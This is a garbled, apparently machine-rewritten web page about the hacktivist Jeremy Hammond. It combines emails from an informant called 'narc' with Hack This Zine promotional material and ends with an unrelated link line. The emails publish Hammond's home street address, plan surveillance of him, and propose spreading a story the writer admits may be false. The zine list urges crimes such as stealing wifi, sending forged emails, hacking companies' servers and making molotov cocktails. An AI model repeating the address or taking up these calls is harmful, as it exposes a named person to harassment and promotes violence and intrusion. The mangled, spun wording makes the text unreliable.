similar cause, we strongly discourage any type of content material that mocks or places down
any attendee(s)."

On Aug 29, 2005, at 10:46 AM, narc <[email protected]> wrote:

It was delivered to my consideration {that a} one Jeremy Hammond determined to make use of a server
at your office to overtly categorical a vulnerability he was demo-ing in a
public Web Relay Chat (IRC) channel. Attributable to latest encounters with this
younger man, I've realized to query any motives of his to reveal this
info, and as such, determined to contact you. Additionally, as I used to be making an attempt to
find you, I additionally uncovered that Jeremy has been utilizing his e mail account for
private enterprise to speak on public boards (Indymedia.org, Chicagoactions.org
and HackThisSite.org got here up as preliminary outcomes).

Upon additional evaluation of the scenario, I additionally famous that Jeremy is the
webmaster for Macspecialist.com. As somebody who's a identified pc prison
(ProtestWarrior, CUGNet, Chicago2600.web, and others that want to not be named
have all been illegally accessed by Jeremy Hammond), I query his motives as
webmaster and additional categorical concern for Macspecialist as an entire.

Contained beneath is the IRC log of the occasions that transpired. Insurgency is
Jeremy. Server: irc.chicago2600.web Channel: #chicago2600

From narc <[email protected]> To: [email protected]
Sept 6: FBI right here TODAY. 3:00 P.M. chi2600
narc, in the event you wanna come, gimme a hoop at XXX-XXX-XXXX ext XXX
I will get you instructions right here.

From: narc <[email protected]> To: [email protected]
Sept 14 Topic: Re: Guess who went to jail once more...
I simply despatched a really misspelled observe in damaged english/french to Jeremy to search out
out the place the Hackbloc shindig is, hopefully he'll reply and I will ship the
data to Chicago Police Intelligence to have a little bit 'particular' enjoyable. I must
pad the Indymedia feedback later tonight.
- narc

From: narc <[email protected]> To: [email protected]
Aug 23 Topic: Re: Area fyi
If its within the slush fund, purchase the remaining domains, however I would actually decide up the
FreeJeremy.web .org .data and lock them out, and level them to fuckjeremy.com
and perhaps seize the .web and .org

If Jeremy does not replace the whois info, the registar will pull the
area and because it stands there may be 247 hyperlinks again on MSN and 42 on Yahoo.
Kinda laborious to get your message out in case your area is gone, and all of your different
marketable domains are owned by nameless events.

Properly, Saturday morning, after bailing from the post-meet breakfast at IHOP, I
did a fast drive-by of Casa-de-Anarchy.... A few block and a half east of
90/94 on the North facet of thestreet.  As within the image on his website, there is a
pair of satellite tv for pc dishes hangning off the porch construction.

Possibly on my approach to GenCon, I will get some reconnaissance photographs. Jeremy Hammond /
1908 South Canalport / Chicago, IL 60608 I am positive we are able to consider one thing
acceptable to do with this information.

> * Give Safety Workplace of Union Station subject of Chicago Reader
I used to be planning on doing that this week, the Amtrak police are just about the
defacto safety there, one thing to the impact that the Chicago 2600 was
planning to fulfill there, however there may be one dangerous apple hell bent on creating strife,
right here is the Chicago Reader article, any further questions I am unable to reply, you
can strive the Chicago workplace of the FBI.

> * Contact "ThePlanet.com" Re: Whois info for FreeJermey.com
I have already got a mail out to them, I might be mailing ICANN tonight to "pace"
issues up a little bit.

From: narc <narc> To: [email protected]
Aug 22 Topic: Re: :: A name for arms ::

Look, Narc makes a variety of legitimate factors, however we're not speaking about details right here,
have been speaking concerning the media. That is about picture, presentability,
salesmanship...not actuality. You want somebody to promote them a greater story, and a
reality based mostly letter to the editor is not going to do something. We'd like a narrative, a
fable, one thing thrilling, that does not make us appear like the dangerous man. Which is
going to be exceedingly tough, as a result of he is already had the story written
about him.

I might even contemplate making him an confederate or confidant of Konopka. Could not
be true, however we're attempting to promote data right here, not run a sweet retailer.

[ dismantling the copyright industry ................ disrespectcopyrights.net ]

"Amount and high quality of P2P applied sciences are inversely proportional to the
numbers of lawsuits issued to cease P2P" - third Monty's Legislation

We're proposing DisrespectCopyrights.web, a portal to info piracy. We
function a assume tank to oppose and subvert the copyright business, whereas
encouraging impartial media and file sharing alternate options to industrial

* file archives - a set of impartial do-it-yourself supplies together with
activism, anarchism, anti-copyright, code, hts, pictures, authorized, mp3, propaganda,
and zines. additionally permits folks to add their very own information.
* information feeds - from varied sources together with the eff, p2pnet, slyck,
respectp2p, and many others.
* wiki - all pages modifiable

We're additionally in search of flash designers to parody the content material obtainable on the
official MPAA website RespectCopyrights.org, twisting their language and imagery to
encourage piracy.


* help file sharing companies by establishing torrent trackers and seeding,
information, beginning ftp/irc drops, and working tor servers on excessive bandwidth
* begin a radical video assortment and burn copies to vcds and dvds handy out
without spending a dime at reveals, faculties, or with different radical literature
* make your individual media and launch it without spending a dime utilizing a Inventive Commons license
* bastardize company imagery, print out stickers and huge posters to cowl
the town
* embrace open publishing methods resembling indymedia, wiki, and many others
* help the ACLU, the EFF, and different civil liberties / digital rights teams.

Think about organizing a pirate parade with costumes flags and devices whereas at
the identical time holding an anti-copyright protest with a bunch of hackers handing
out free software program. This avenue motion is considered one of many potential situations for
upcoming conventions like HOPE. The probabilities are countless.

                             !!!  HACK THIS ZINE  !!!
                             !!!   SPRING 2006    !!!

We're an impartial collective of artistic hackers, crackers, artists and
anarchists. We collect to debate and educate one another via vulnerability
analysis and code auditing, sensible anarchy and organizing for nationwide
conventions and protests.  Be a part of us to discover optimistic hacktivism to assist defend
a free web and a free society.

                            THE INTERNET IS THE STAGE
                                WE ARE THE ACTORS

                                 Jeremy Hammond
                               whooka at gmail.com

DarkAngel, OutThere, Kuroishi, br0kenkeychain, reality, nomenumbra, C

IceShaman, html, buz, Custodis, OutThere, archaios, Mcaster, ScriptBlue,
TechnoGuyRob, scenestar

flatline, alxclada, DarkAngel, Ardeo, Kuroishi, Thetan, wyrmkill, Reality,
EvilDeshi, ScriptBlue

bfamredux, Phate, LeaChim, skopii, s1d, tgo, Hawk, ikari, Random Cola, genome,
EvilDeshi/WickedRadio, darwin, DarKry, C, Weiznit

those that are courageous sufficient to confront and combat racists, homphobes, non secular
fundamentalists, right-wing extremists and different fascists on the street, these
who do emergency fundraising, media work, and drive lots of of miles to bail us
out of jail, my companion in crime fetus who via our love commited numerous
superbly loopy actions I dare not converse of, the cool folks at chicago2600
who do not put up with the bullshit from the white hats feds and narcs, the
militant anti-capitalists at midwest unrest and prole.data, the magical folks
who go to the rainbow gatherings, moon festivals, burning man and different
gatherings of free minded folks, those that are courageous and keen to danger
every thing to take direct motion in protection of mom earth and it is creatures.

the loopy hackers at anomalous safety, pulltheplug, the #phrack efnet crew,
digital souls, el8 / h0no, rant media, x10, dikline, we're all brothers and
sisters working collectively to dismantle the white hat safety business who would
given the possibility would promote us all out.

                                  GET INVOLVED
                                   ON THE WWW
              hackthissite.org * hacktivist.web * hackbloc.org
         rootthisbox.org * disrespectcopyrights.web * wickedradio.org
            indymedia.org * infoshop.org * crimethinc.com/web/org

                                  MAKE CONTACT
     irc.hackthissite.org SSL port 7000 #hackthissite  #hacktivist.web #assist
               go to our on-line boards at criticalsecurity.web

                         e mail us at [email protected]

                         !!!       HAPPENINGS       !!!
                         !!!  GET YOUR HACKBLOC ON  !!!


                          BAY AREA ANARCHIST BOOKFAIR
                           MARCH 19 ANTIWAR PROTESTS


                         HACKERS ON PLANET EARTH / 2600
                           NEW YORK CITY, JULY 21-23


construct a cantenna and steal wi-fi web entry * announce phony mayor
resignations * give folks reductions on cellphone gasoline web or different utilities *
begin a pirate radio station * give away free cellphone playing cards and get away with it *
by no means speak to the police, refuse to present statements or testimony, and help
political prisoners * op everybody in an irc channel * reprint, reword, and reuse
copyrighted materials * go to high school or work carrying bathrobes, skirts, and
pirate costumes * shut down main intersections within the enterprise district * make
copies of radical movies and provides them away without spending a dime * spew confusion at normals
* ship faux emails because the boss and announce raises for everyone * maintain avenue
events to have fun the great prospects of life * begin a neighborhood "write
on every thing day" * plant political propaganda in elementary faculties * seed
torrent information * squat deserted buildings and maintain underground events * steal
from the wealthy and provides to the poor * arm philosophers and the homeless * take
over main media shops and broadcast subversive messages * develop file
sharing companies and non-commercial web * maintain acid assessments and invite the
neighbors * begin underground guerrilla public drum and dance brigades *
confront racists, homophobes, right-wingers and different bigots on the road *
produce your individual music, zines, and clothes * sniff company site visitors and create
scandals * deface billboards with anti-capitalist messages * fill your head with
heinous chemical compounds and speak to strangers on the prepare. do not inform them what your
on * cross out maps to wealthy folks's addresses to the homeless * defeat
self-checkout companies * syphon gasoline, dumpster some bottles, and study to
make molotov cocktails * program a free open supply various to a industrial
software program utility * convert your automotive to make use of bio-diesel * begin wildcat
strikes and storm government workplaces * make stencils, giant posters + wheatpaste
and hit the streets * social engineer some meals and provides it out to folks on the
avenue * crash political social gathering conventions * refuse to get a bank card or
different checking account * trip your bike within the quick lane * manage a faculty walkout
* hook folks up with free cable * study to select locks and the best way to get away of
handcuffs * destroy white hats, feds and narcs * by no means ask permission, and do not
apologize *  hack the recording business and use their servers to seed torrents
to share industrial music, movies and software program * manage a pirate parade and
give out copies of linux * begin a hacker class struggle

See also  Apple hiring automobile expertise engineer in China